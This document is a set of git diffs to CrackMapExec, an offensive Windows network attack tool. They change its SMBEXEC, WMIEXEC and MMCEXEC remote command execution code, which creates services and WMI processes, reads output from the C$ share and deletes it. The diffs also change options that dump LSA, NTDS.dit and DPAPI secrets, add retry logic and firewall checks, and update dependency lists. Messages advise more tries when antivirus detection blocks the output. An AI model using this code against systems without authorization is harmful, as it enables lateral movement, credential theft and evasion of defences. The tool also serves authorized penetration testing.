self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
||||||
break
|
break
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if str(e).find("STATUS_SHARING_VIOLATION") >= 0:
|
if tries >= self.__tries:
|
||||||
|
self.logger.fail('MMCEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option "--get-output-tries"; if it keeps failing, something may be blocking the output retrieval, so try another exec method')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
|
||||||
|
self.logger.fail(f'MMCEXEC: Get ouput failed, target has blocked {self.__share} access (maybe command executed!)')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
# Output not finished, let's wait
|
# Output not finished, let's wait
|
||||||
sleep(2)
|
sleep(2)
|
||||||
pass
|
tries += 1
|
||||||
else:
|
else:
|
||||||
pass
|
self.logger.debug(str(e))
|
||||||
|
|
||||||
|
if self.__outputBuffer:
|
||||||
|
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.deleteFile(self.__share, self.__output)
|
self.__smbconnection.deleteFile(self.__share, self.__output)
|
|
@ -19,8 +19,8 @@ def proto_args(parser, std_parser, module_parser):
|
||||||
cgroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
|
cgroup.add_argument("--lsa", action="store_true", help="dump LSA secrets from target systems")
|
||||||
cgroup.add_argument("--ntds", choices={"vss", "drsuapi"}, nargs="?", const="drsuapi",
|
cgroup.add_argument("--ntds", choices={"vss", "drsuapi"}, nargs="?", const="drsuapi",
|
||||||
help="dump the NTDS.dit from target DCs using the specifed method\n(default: drsuapi)")
|
help="dump the NTDS.dit from target DCs using the specifed method\n(default: drsuapi)")
|
||||||
cgroup.add_argument("--dpapi", choices={"password", "cookies"}, nargs="?", const="password",
|
cgroup.add_argument("--dpapi", choices={"cookies","nosystem"}, nargs="*",
|
||||||
help="dump DPAPI secrets from target systems, can dump cookies if you add \"cookies\"\n(default: password)")
|
help="dump DPAPI secrets from target systems, can dump cookies if you add \"cookies\", will not dump SYSTEM dpapi if you add nosystem\n")
|
||||||
# cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history')
|
# cgroup.add_argument("--ntds-history", action='store_true', help='Dump NTDS.dit password history')
|
||||||
# cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account')
|
# cgroup.add_argument("--ntds-pwdLastSet", action='store_true', help='Shows the pwdLastSet attribute for each NTDS.dit account')
|
||||||
|
|
||||||
|
@ -79,6 +79,8 @@ def proto_args(parser, std_parser, module_parser):
|
||||||
cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands")
|
cgroup = smb_parser.add_argument_group("Command Execution", "Options for executing commands")
|
||||||
cgroup.add_argument("--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default=None,
|
cgroup.add_argument("--exec-method", choices={"wmiexec", "mmcexec", "smbexec", "atexec"}, default=None,
|
||||||
help="method to execute the command. Ignored if in MSSQL mode (default: wmiexec)")
|
help="method to execute the command. Ignored if in MSSQL mode (default: wmiexec)")
|
||||||
|
cgroup.add_argument("--wmiexec-timeout", help="WMIEXEC connection timeout, default is 5 secondes", type=int, default=5)
|
||||||
|
cgroup.add_argument("--get-output-tries", help="Number of times atexec/smbexec/mmcexec tries to get results, default is 5", type=int, default=5)
|
||||||
cgroup.add_argument("--codec", default="utf-8",
|
cgroup.add_argument("--codec", default="utf-8",
|
||||||
help="Set encoding used (codec) from the target's output (default "
|
help="Set encoding used (codec) from the target's output (default "
|
||||||
"\"utf-8\"). If errors are detected, run chcp.com at the target, "
|
"\"utf-8\"). If errors are detected, run chcp.com at the target, "
|
||||||
|
|
|
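The command-execution options added above are plain argparse flags: --dpapi now collects zero or more keywords instead of a single choice, and the two new integer options default to 5. A self-contained argparse sketch limited to these three options (the parser name and help strings are illustrative):

import argparse

parser = argparse.ArgumentParser(prog="smb-options-sketch")
parser.add_argument("--dpapi", choices={"cookies", "nosystem"}, nargs="*",
                    help="dump DPAPI secrets; add cookies and/or nosystem to tune the dump")
parser.add_argument("--wmiexec-timeout", type=int, default=5,
                    help="WMIEXEC connection timeout in seconds")
parser.add_argument("--get-output-tries", type=int, default=5,
                    help="number of attempts to read the exec output file")

args = parser.parse_args(["--dpapi", "cookies", "nosystem", "--get-output-tries", "10"])
print(args.dpapi, args.wmiexec_timeout, args.get_output_tries)  # ['cookies', 'nosystem'] 5 10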
@ -6,7 +6,6 @@ from os.path import join as path_join
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from impacket.dcerpc.v5 import transport, scmr
|
from impacket.dcerpc.v5 import transport, scmr
|
||||||
from cme.helpers.misc import gen_random_string
|
from cme.helpers.misc import gen_random_string
|
||||||
from cme.logger import cme_logger
|
|
||||||
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
|
from impacket.dcerpc.v5.rpcrt import RPC_C_AUTHN_GSS_NEGOTIATE
|
||||||
|
|
||||||
|
|
||||||
|
@ -26,7 +25,8 @@ class SMBEXEC:
|
||||||
hashes=None,
|
hashes=None,
|
||||||
share=None,
|
share=None,
|
||||||
port=445,
|
port=445,
|
||||||
logger=cme_logger
|
logger=None,
|
||||||
|
tries=None
|
||||||
):
|
):
|
||||||
self.__host = host
|
self.__host = host
|
||||||
self.__share_name = "C$"
|
self.__share_name = "C$"
|
||||||
|
@ -51,6 +51,7 @@ class SMBEXEC:
|
||||||
self.__aesKey = aesKey
|
self.__aesKey = aesKey
|
||||||
self.__doKerberos = doKerberos
|
self.__doKerberos = doKerberos
|
||||||
self.__kdcHost = kdcHost
|
self.__kdcHost = kdcHost
|
||||||
|
self.__tries = tries
|
||||||
self.logger = logger
|
self.logger = logger
|
||||||
|
|
||||||
if hashes is not None:
|
if hashes is not None:
|
||||||
|
@ -126,6 +127,8 @@ class SMBEXEC:
|
||||||
self.logger.debug("Command to execute: " + command)
|
self.logger.debug("Command to execute: " + command)
|
||||||
|
|
||||||
self.logger.debug(f"Remote service {self.__serviceName} created.")
|
self.logger.debug(f"Remote service {self.__serviceName} created.")
|
||||||
|
|
||||||
|
try:
|
||||||
resp = scmr.hRCreateServiceW(
|
resp = scmr.hRCreateServiceW(
|
||||||
self.__scmr,
|
self.__scmr,
|
||||||
self.__scHandle,
|
self.__scHandle,
|
||||||
|
@ -135,6 +138,12 @@ class SMBEXEC:
|
||||||
dwStartType=scmr.SERVICE_DEMAND_START,
|
dwStartType=scmr.SERVICE_DEMAND_START,
|
||||||
)
|
)
|
||||||
service = resp["lpServiceHandle"]
|
service = resp["lpServiceHandle"]
|
||||||
|
except Exception as e:
|
||||||
|
if "rpc_s_access_denied" in str(e):
|
||||||
|
self.logger.fail("SMBEXEC: Create services got blocked.")
|
||||||
|
return self.__outputBuffer
|
||||||
|
else:
|
||||||
|
pass
|
||||||
|
|
||||||
try:
|
try:
|
||||||
self.logger.debug(f"Remote service {self.__serviceName} started.")
|
self.logger.debug(f"Remote service {self.__serviceName} started.")
|
||||||
|
@ -150,20 +159,28 @@ class SMBEXEC:
|
||||||
if self.__retOutput is False:
|
if self.__retOutput is False:
|
||||||
self.__outputBuffer = ""
|
self.__outputBuffer = ""
|
||||||
return
|
return
|
||||||
|
tries = 1
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
|
self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
||||||
break
|
break
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
print(e)
|
if tries >= self.__tries:
|
||||||
if str(e).find("STATUS_SHARING_VIOLATION") >= 0:
|
self.logger.fail('SMBEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option "--get-output-tries"; if it keeps failing, something may be blocking the output retrieval, so try another exec method')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
|
||||||
|
self.logger.fail(f'SMBEXEC: Get ouput failed, target has blocked {self.__share} access (maybe command executed!)')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
# Output not finished, let's wait
|
# Output not finished, let's wait
|
||||||
sleep(2)
|
sleep(2)
|
||||||
pass
|
tries += 1
|
||||||
else:
|
else:
|
||||||
self.logger.debug(e)
|
self.logger.debug(str(e))
|
||||||
pass
|
|
||||||
|
|
||||||
|
if self.__outputBuffer:
|
||||||
|
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.deleteFile(self.__share, self.__output)
|
self.__smbconnection.deleteFile(self.__share, self.__output)
|
||||||
|
|
||||||
def execute_fileless(self, data):
|
def execute_fileless(self, data):
|
||||||
|
|
|
@ -5,7 +5,7 @@ import ntpath
|
||||||
import os
|
import os
|
||||||
from time import sleep
|
from time import sleep
|
||||||
from cme.helpers.misc import gen_random_string
|
from cme.helpers.misc import gen_random_string
|
||||||
from cme.logger import cme_logger
|
from impacket.dcerpc.v5 import transport
|
||||||
from impacket.dcerpc.v5.dcomrt import DCOMConnection
|
from impacket.dcerpc.v5.dcomrt import DCOMConnection
|
||||||
from impacket.dcerpc.v5.dcom import wmi
|
from impacket.dcerpc.v5.dcom import wmi
|
||||||
from impacket.dcerpc.v5.dtypes import NULL
|
from impacket.dcerpc.v5.dtypes import NULL
|
||||||
|
@ -25,7 +25,9 @@ class WMIEXEC:
|
||||||
kdcHost=None,
|
kdcHost=None,
|
||||||
hashes=None,
|
hashes=None,
|
||||||
share=None,
|
share=None,
|
||||||
logger=cme_logger
|
logger=None,
|
||||||
|
timeout=None,
|
||||||
|
tries=None
|
||||||
):
|
):
|
||||||
self.__target = target
|
self.__target = target
|
||||||
self.__username = username
|
self.__username = username
|
||||||
|
@ -34,6 +36,7 @@ class WMIEXEC:
|
||||||
self.__lmhash = ""
|
self.__lmhash = ""
|
||||||
self.__nthash = ""
|
self.__nthash = ""
|
||||||
self.__share = share
|
self.__share = share
|
||||||
|
self.__timeout = timeout
|
||||||
self.__smbconnection = smbconnection
|
self.__smbconnection = smbconnection
|
||||||
self.__output = None
|
self.__output = None
|
||||||
self.__outputBuffer = b""
|
self.__outputBuffer = b""
|
||||||
|
@ -44,6 +47,8 @@ class WMIEXEC:
|
||||||
self.__kdcHost = kdcHost
|
self.__kdcHost = kdcHost
|
||||||
self.__doKerberos = doKerberos
|
self.__doKerberos = doKerberos
|
||||||
self.__retOutput = True
|
self.__retOutput = True
|
||||||
|
self.__stringBinding = ""
|
||||||
|
self.__tries = tries
|
||||||
self.logger = logger
|
self.logger = logger
|
||||||
|
|
||||||
if hashes is not None:
|
if hashes is not None:
|
||||||
|
@ -68,12 +73,39 @@ class WMIEXEC:
|
||||||
kdcHost=self.__kdcHost,
|
kdcHost=self.__kdcHost,
|
||||||
)
|
)
|
||||||
iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
|
iInterface = self.__dcom.CoCreateInstanceEx(wmi.CLSID_WbemLevel1Login, wmi.IID_IWbemLevel1Login)
|
||||||
|
try:
|
||||||
|
self.firewall_check(iInterface, self.__timeout)
|
||||||
|
except:
|
||||||
|
self.logger.fail(f'WMIEXEC: Dcom initialization failed on connection with stringbinding: "{self.__stringBinding}", please increase the timeout with the option "--wmiexec-timeout". If it\'s still failing maybe something is blocking the RPC connection, try another exec method')
|
||||||
|
self.__dcom.disconnect()
|
||||||
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
|
iWbemLevel1Login = wmi.IWbemLevel1Login(iInterface)
|
||||||
iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
iWbemServices = iWbemLevel1Login.NTLMLogin("//./root/cimv2", NULL, NULL)
|
||||||
iWbemLevel1Login.RemRelease()
|
iWbemLevel1Login.RemRelease()
|
||||||
|
|
||||||
self.__win32Process, _ = iWbemServices.GetObject("Win32_Process")
|
self.__win32Process, _ = iWbemServices.GetObject("Win32_Process")
|
||||||
|
|
||||||
|
def firewall_check(self, iInterface ,timeout):
|
||||||
|
stringBindings = iInterface.get_cinstance().get_string_bindings()
|
||||||
|
for strBinding in stringBindings:
|
||||||
|
if strBinding['wTowerId'] == 7:
|
||||||
|
if strBinding['aNetworkAddr'].find('[') >= 0:
|
||||||
|
binding, _, bindingPort = strBinding['aNetworkAddr'].partition('[')
|
||||||
|
bindingPort = '[' + bindingPort
|
||||||
|
else:
|
||||||
|
binding = strBinding['aNetworkAddr']
|
||||||
|
bindingPort = ''
|
||||||
|
|
||||||
|
if binding.upper().find(iInterface.get_target().upper()) >= 0:
|
||||||
|
stringBinding = 'ncacn_ip_tcp:' + strBinding['aNetworkAddr'][:-1]
|
||||||
|
break
|
||||||
|
elif iInterface.is_fqdn() and binding.upper().find(iInterface.get_target().upper().partition('.')[0]) >= 0:
|
||||||
|
stringBinding = 'ncacn_ip_tcp:%s%s' % (iInterface.get_target(), bindingPort)
|
||||||
|
|
||||||
|
self.__stringBinding = stringBinding
|
||||||
|
rpctransport = transport.DCERPCTransportFactory(stringBinding)
|
||||||
|
rpctransport.set_connect_timeout(timeout)
|
||||||
|
rpctransport.connect()
|
||||||
|
rpctransport.disconnect()
|
||||||
|
|
||||||
def execute(self, command, output=False):
|
def execute(self, command, output=False):
|
||||||
self.__retOutput = output
|
self.__retOutput = output
|
||||||
if self.__retOutput:
|
if self.__retOutput:
|
||||||
|
@ -101,15 +133,12 @@ class WMIEXEC:
|
||||||
self.__outputBuffer += data
|
self.__outputBuffer += data
|
||||||
|
|
||||||
def execute_handler(self, data):
|
def execute_handler(self, data):
|
||||||
if self.__retOutput:
|
|
||||||
try:
|
try:
|
||||||
self.logger.debug("Executing remote")
|
self.logger.debug("Executing remote")
|
||||||
self.execute_remote(data)
|
self.execute_remote(data)
|
||||||
except:
|
except:
|
||||||
self.cd("\\")
|
self.cd("\\")
|
||||||
self.execute_remote(data)
|
self.execute_remote(data)
|
||||||
else:
|
|
||||||
self.execute_remote(data)
|
|
||||||
|
|
||||||
def execute_remote(self, data):
|
def execute_remote(self, data):
|
||||||
self.__output = "\\Windows\\Temp\\" + gen_random_string(6)
|
self.__output = "\\Windows\\Temp\\" + gen_random_string(6)
|
||||||
|
@ -146,17 +175,26 @@ class WMIEXEC:
|
||||||
self.__outputBuffer = ""
|
self.__outputBuffer = ""
|
||||||
return
|
return
|
||||||
|
|
||||||
|
tries = 1
|
||||||
while True:
|
while True:
|
||||||
try:
|
try:
|
||||||
|
self.logger.info(f"Attempting to read {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
self.__smbconnection.getFile(self.__share, self.__output, self.output_callback)
|
||||||
break
|
break
|
||||||
except Exception as e:
|
except Exception as e:
|
||||||
if str(e).find("STATUS_SHARING_VIOLATION") >= 0:
|
if tries >= self.__tries:
|
||||||
# Output not finished, let's wait
|
self.logger.fail('WMIEXEC: Could not retrieve output file, it may have been detected by AV. Please increase the number of tries with the option "--get-output-tries"; if it keeps failing, something may be blocking the output retrieval, so try another exec method')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_BAD_NETWORK_NAME") >0 :
|
||||||
|
self.logger.fail(f'SMB connection: target has blocked {self.__share} access (maybe command executed!)')
|
||||||
|
break
|
||||||
|
if str(e).find("STATUS_SHARING_VIOLATION") >= 0 or str(e).find("STATUS_OBJECT_NAME_NOT_FOUND") >= 0:
|
||||||
sleep(2)
|
sleep(2)
|
||||||
|
tries += 1
|
||||||
pass
|
pass
|
||||||
else:
|
else:
|
||||||
# print str(e)
|
self.logger.debug(str(e))
|
||||||
pass
|
|
||||||
|
|
||||||
|
if self.__outputBuffer:
|
||||||
|
self.logger.debug(f"Deleting file {self.__share}\\{self.__output}")
|
||||||
self.__smbconnection.deleteFile(self.__share, self.__output)
|
self.__smbconnection.deleteFile(self.__share, self.__output)
|
File diff suppressed because it is too large
|
@ -44,7 +44,7 @@ pywerview = "^0.3.3"
|
||||||
minikerberos = "^0.4.0"
|
minikerberos = "^0.4.0"
|
||||||
pypykatz = "^0.6.8"
|
pypykatz = "^0.6.8"
|
||||||
aardwolf = "^0.2.7"
|
aardwolf = "^0.2.7"
|
||||||
dploot = "^2.1.21"
|
dploot = "^2.2.1"
|
||||||
bloodhound = "^1.6.1"
|
bloodhound = "^1.6.1"
|
||||||
asyauth = "~0.0.13"
|
asyauth = "~0.0.13"
|
||||||
masky = "^0.2.0"
|
masky = "^0.2.0"
|
||||||
|
|
|
@ -1,89 +0,0 @@
|
||||||
aardwolf==0.2.7 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
aesedb==0.1.4 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
aioconsole==0.3.3 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
aiosmb==0.4.6 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
aiosqlite==0.18.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
aiowinreg==0.0.10 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
arc4==0.4.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
asn1crypto==1.5.1 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
asn1tools==0.166.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
asyauth==0.0.14 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
asysocks==0.2.7 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
bcrypt==4.0.1 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
beautifulsoup4==4.12.2 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
bitstruct==8.17.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
bloodhound==1.6.1 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
bs4==0.0.1 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
certifi==2023.5.7 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
cffi==1.15.1 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
charset-normalizer==3.1.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
click==8.1.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
colorama==0.4.6 ; python_full_version < "4.0.0" and python_version >= "3.7" or python_version >= "3.7" and python_version < "4.0" and platform_system == "Windows"
|
|
||||||
cryptography==40.0.2 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
dnspython==2.3.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
dploot==2.1.22 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
dsinternals==1.2.4 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
exceptiongroup==1.1.1 ; python_version >= "3.7" and python_version < "3.11"
|
|
||||||
flask==2.2.5 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
future==0.18.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
greenlet==2.0.2 ; python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "aarch64" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "ppc64le" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "x86_64" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "amd64" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "AMD64" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "win32" or python_version >= "3.7" and python_full_version < "4.0.0" and platform_machine == "WIN32"
|
|
||||||
idna==3.4 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
impacket @ git+https://github.com/mpgn/impacket.git@gkdi ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
importlib-metadata==4.2.0 ; python_version >= "3.7" and python_version < "3.10"
|
|
||||||
iniconfig==2.0.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
itsdangerous==2.1.2 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
jinja2==3.1.2 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
ldap3==2.9.1 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
ldapdomaindump==0.9.4 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
lsassy==3.1.8 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
lxml==4.9.2 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
markdown-it-py==2.2.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
markupsafe==2.1.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
masky==0.2.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
mdurl==0.1.2 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
minidump==0.0.21 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
minikerberos==0.4.1 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
msgpack==1.0.5 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
msldap==0.5.5 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
neo4j==4.4.11 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
netaddr==0.8.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
oscrypto==1.3.0 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
packaging==23.1 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
paramiko==2.12.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pillow==9.5.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
pluggy==1.2.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
prompt-toolkit==3.0.38 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
pyasn1-modules==0.3.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pyasn1==0.4.8 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pycparser==2.21 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pycryptodomex==3.18.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pygments==2.15.1 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
pylnk3==0.4.2 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pynacl==1.5.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pyopenssl==23.2.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pyparsing==3.1.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
pyperclip==1.8.2 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
pypsrp==0.7.0 ; python_full_version >= "3.7.0" and python_version < "4.0"
|
|
||||||
pypykatz==0.6.8 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pyspnego==0.9.1 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
pytest==7.4.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
python-libnmap==0.7.3 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pytz==2023.3 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
pywerview==0.3.3 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
requests==2.31.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
rich==13.4.2 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
six==1.16.0 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
soupsieve==2.4.1 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
sqlalchemy==2.0.17 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
termcolor==1.1.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
terminaltables==3.1.10 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
tomli==2.0.1 ; python_version >= "3.7" and python_version < "3.11"
|
|
||||||
tqdm==4.65.0 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
typing-extensions==4.6.3 ; python_version >= "3.7" and python_full_version < "4.0.0"
|
|
||||||
unicrypto==0.0.10 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
urllib3==2.0.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
wcwidth==0.2.6 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
werkzeug==2.2.3 ; python_version >= "3.7" and python_version < "4.0"
|
|
||||||
winacl==0.1.7 ; python_full_version < "4.0.0" and python_version >= "3.7"
|
|
||||||
xmltodict==0.12.0 ; python_full_version >= "3.7.0" and python_full_version < "4.0.0"
|
|
||||||
zipp==3.15.0 ; python_version >= "3.7" and python_version < "3.10"
|
|